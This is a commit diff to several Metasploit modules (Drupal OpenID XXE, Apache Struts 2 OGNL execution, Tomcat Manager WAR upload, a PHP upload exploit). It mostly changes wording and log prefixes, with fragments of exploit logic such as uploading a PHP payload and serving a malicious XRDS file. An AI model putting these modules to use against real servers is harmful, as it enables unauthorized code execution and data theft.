William Vu
commit
ab4f62c44e
|
|
@ -17,10 +17,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Drupal OpenID External Entity Injection',
|
'Name' => 'Drupal OpenID External Entity Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module abuses a XML External Entity Injection on the OpenID module
|
This module abuses an XML External Entity Injection
|
||||||
from Drupal. The vulnerability exists on the parsing of a malformed XRDS
|
vulnerability on the OpenID module from Drupal. The vulnerability exists
|
||||||
file coming from a malicious OpenID endpoint. This module has been tested
|
in the parsing of a malformed XRDS file coming from a malicious OpenID
|
||||||
successfully in Drupal 7.15 and 7.2 with the OpenID module enabled.
|
endpoint. This module has been tested successfully on Drupal 7.15 and
|
||||||
|
7.2 with the OpenID module enabled.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
@ -102,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
res = send_openid_auth(signature)
|
res = send_openid_auth(signature)
|
||||||
|
|
||||||
unless res
|
unless res
|
||||||
vprint_status("Connection timed out")
|
vprint_status("#{peer} - Connection timed out")
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -157,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
if request.uri =~ /#{@prefix}/
|
if request.uri =~ /#{@prefix}/
|
||||||
vprint_status("Signature found, parsing file...")
|
vprint_status("#{peer} - Signature found, parsing file...")
|
||||||
@http_loot = parse_loot(request.uri)
|
@http_loot = parse_loot(request.uri)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Sending XRDS...")
|
print_status("#{peer} - Sending XRDS...")
|
||||||
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
|
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Apache Struts Developer Mode OGNL Execution',
|
'Name' => 'Apache Struts 2 Developer Mode OGNL Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a remote command execution vulnerability in Apache
|
This module exploits a remote command execution vulnerability in Apache
|
||||||
Struts 2. The problem exists on applications running in developer mode,
|
Struts 2. The problem exists on applications running in developer mode,
|
||||||
where the DebuggingInterceptor allows evaluation and execution of OGNL
|
where the DebuggingInterceptor allows evaluation and execution of OGNL
|
||||||
expressions, which allows remote attackers to execute arbitrary Java
|
expressions, which allows remote attackers to execute arbitrary Java
|
||||||
code. This module has been tested successfully in Struts 2.3.16, Tomcat
|
code. This module has been tested successfully on Struts 2.3.16, Tomcat
|
||||||
7 and Ubuntu 10.04.
|
7 and Ubuntu 10.04.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
|
||||||
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
|
'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module can be used to execute a payload on Apache Tomcat servers that
|
This module can be used to execute a payload on Apache Tomcat servers that
|
||||||
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
||||||
|
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_raw('uri' => path)
|
res = send_request_raw('uri' => path)
|
||||||
|
|
||||||
unless res and res.code == 200
|
unless res and res.code == 200
|
||||||
vprint_error("Failed: Error requesting #{path}")
|
vprint_error("#{peer} - Failed: Error requesting #{path}")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if res.code < 200 or res.code >= 300
|
if res.code < 200 or res.code >= 300
|
||||||
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
||||||
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -423,4 +423,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
|
|
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
||||||
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
||||||
|
|
||||||
print_status("#{peer} - Uploading malicious file...")
|
print_status("#{peer} - Uploading PHP payload...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
||||||
|
|
|
||||||
|
|
@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Sending request to #{uri}.")
|
||||||
|
|
||||||
send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue